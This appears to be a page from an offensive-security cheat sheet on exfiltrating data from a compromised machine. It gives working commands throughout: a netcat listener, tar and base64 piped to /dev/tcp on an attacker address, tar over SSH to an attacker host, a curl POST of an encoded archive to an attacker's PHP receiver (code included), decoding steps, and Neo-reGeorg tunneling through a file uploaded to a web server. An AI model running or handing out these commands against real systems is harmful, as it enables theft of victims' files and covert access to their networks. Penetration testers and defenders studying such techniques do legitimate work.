Skip to content

Exfiltration

Using TCP Socket

Attacker listener: 

nc -lvp 8080 > /tmp/exfil.data

From victim: 

tar zcf - folder/ | base64 | dd conv=ebcdic > /dev/tcp/1.2.3.4/8080

Decrypt data: 

dd conv=ascii if=exfil.data | base64 -d > exfil.tar
tar xvf exfil.tar

Using SSH

tar cf - folder/ | ssh kali@1.2.3.4 "cd /tmp/; tar xpf -"

Using HTTP(S)

From victim: 

curl --data "file=$(tar zcf - folder | base64)" http://<attacker_ip>/contact.php

contact.php: 

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

Decode file: 

sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -

HTTP Tunneling

When you can upload file to the web server, using Neo-reGeorg.

  1. Generate encrypted Tunneling clients with key key in the neoreg_servers/ directory.
python3 neoreg.py generate -k key
  1. Upload file
  2. Create tunnel
python3 neoreg.py -k key -u <URL to uploaded file>
  1. Access